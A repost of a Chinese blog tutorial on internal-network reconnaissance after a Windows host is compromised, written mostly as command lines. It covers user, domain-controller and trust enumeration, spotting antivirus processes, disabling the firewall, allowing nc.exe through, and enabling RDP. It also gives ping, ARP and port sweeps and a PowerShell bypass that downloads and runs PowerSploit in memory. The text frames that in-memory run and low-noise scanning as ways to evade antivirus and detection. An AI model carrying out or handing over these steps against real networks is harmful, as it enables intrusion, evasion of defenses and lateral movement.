欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

内网安全学习从入门到入狱-知识-内网信息探测与收集

程序员文章站 2022-05-15 22:08:58
...

内网安全学习从入门到入狱-知识-内网信息收集

  • 前提准备

本文中PowerShell脚本可以自行下载

https://github.com/PowerShellMafia/PowerSploit

0x01本机检查–先看看我是谁

域内的主机一般都是批量的,所以我们看看我们自己,基本上大家也就是差不多的情况

先看看ip,看看网卡,内外网情况,IP段记录一下,DNS

ipconfig /all

查看用户列表

net user

查看在线的用户

query user || qwinsta
内网安全学习从入门到入狱-知识-内网信息探测与收集

查看本机管理员

net localgroup administrators

内网安全学习从入门到入狱-知识-内网信息探测与收集

看管理员进程

tasklist /v

内网安全学习从入门到入狱-知识-内网信息探测与收集

域管理进程 hack\adminishtartor

内网安全学习从入门到入狱-知识-内网信息探测与收集

还有一些常见杀软

360sd…EXE 360
360tray.EXE 360
ZHUDONGFANGYU.EXE 360
KSAFETRAY.EXE 金山
MACAFEE MCSHIELD.EXE MacAfee
AVP.EXE K卡巴斯基
AVGGUARD.EXE 小红伞
EGUI.EXE Nod32
  • 查看进程 too
  wmic process list brief
  • 查看端口
  netstat -ano
systeminfo  或者 wmic qfe get Caption,Description,HotFixID,InstalledOn
  • 查看共享列表

net share           wmic share get name,path,status

内网安全学习从入门到入狱-知识-内网信息探测与收集

(1)关闭防火墙
Windows Server 2003 系统及之前版本

  netsh firewall set opmode disable

Windows Server 2003 之后系统版本,命令如下。

  netsh advfirewall set allprofiles state off
  • 修改防火墙配置
    Windows Server 2003 系统及之前版本,允许指定程序全部连接,命令如下。
    netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
    Windows Server 2003 之后系统版本,情况如下。
     允许指定程序连入,命令如下。
  netsh advfirewall firewall add rule name="pass nc" dir=in action=allow 
  program="C: \nc.exe"

 允许指定程序连出,命令如下。

  netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow 
  program="C: \nc.exe"

允许 3389 端口放行,命令如下。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in 
  localport=3389 action=allow

查询并开启远程连接服务

查看远程连接端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

内网安全学习从入门到入狱-知识-内网信息探测与收集

在 Windows Server 2003 中开启 3389 端口

wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口

一般前两个命令就开启了

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1



wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1



reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

内网安全学习从入门到入狱-知识-内网信息探测与收集

查询域控制器列表

Net group "Domain Controller" /domain

收集管理员列表

Net group "Domain admins" /domain

内网安全学习从入门到入狱-知识-内网信息探测与收集

  • 列出或断开本地计算机和连接的客户端的会话
  • net session

0x02域内信息收集

查询当前额权限

  • 获取域 SID
  whoami  /all
  • 查询指定账户的详细信息。
  net user XXX /domain

判断是否有域

主要利用

ifconfig /all
systeminfo
net view /domain   			查询域
net view /domain:XXX    查询此域内所有计算机
net group /domain				查询域内所有用户
net config workstation
net time /domain

内网安全学习从入门到入狱-知识-内网信息探测与收集

net group "domain computers" /domain   查询所有域成员计算机

net accounts /domain  获取域密码信息
这个在大型内网,多个域很重要
获取域信任信息

nltest /domain_trusts

查找域控

可以看到域控制器机器名

nltest /DCLIST:hack

查看域控制器的主机

Nslookup -type=SRV _ldap._tcp
获取域内的用户信息

获取域内用户信息

net user /domain

查看存在用户

dsquery user

0x03 域内网存活主机的探测

主机存活扫描

内网探测要点

  • 避免使用大流量攻击的软件和图形化的东西
  • 避免杀软敏感操作
  • 尽量使用系统自带的组件
  • 上班和下班多次扫描,可以进行对比网络情况

1.利用netbios快速探测内网

Netbios.exe 192.168.0.1/24

2.利用 ICMP 协议快速探测内网----ping命令主要使用—有的ping不通很正常

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

3.通过 ARP 扫描探测内网

arp-scan 工具
Arp.exe –t 192.168.1.0/20     

Nishang 中的 Invoke-ARPScan.ps1扫描
powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\windows\temp\log.txt

Empire 中的 arpsan 模块
usemodule situational_awareness/network/arpscan
set Range 192.168.1.0-192.168.0.254
execute

4.利用TCP UDP工具扫描

ScanLine 是一款经典的端口扫描工具 体积小,动静小

scanline -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\log.txt -p 192.168.1.1-254 /b

域内端口扫描

建议 wmi和powershell工具 动静小好

S扫描器

Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。

PowerSploit 中的 Invoke-Portscan.ps1 脚本

这个强大之处在于是无文件落地的扫描,很强大,

可以绕过一些杀软

主要机子要联网能连接到 GitHub这个地址
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"

内网安全学习从入门到入狱-知识-内网信息探测与收集
内网安全学习从入门到入狱-知识-内网信息探测与收集

相关标签: 内网安全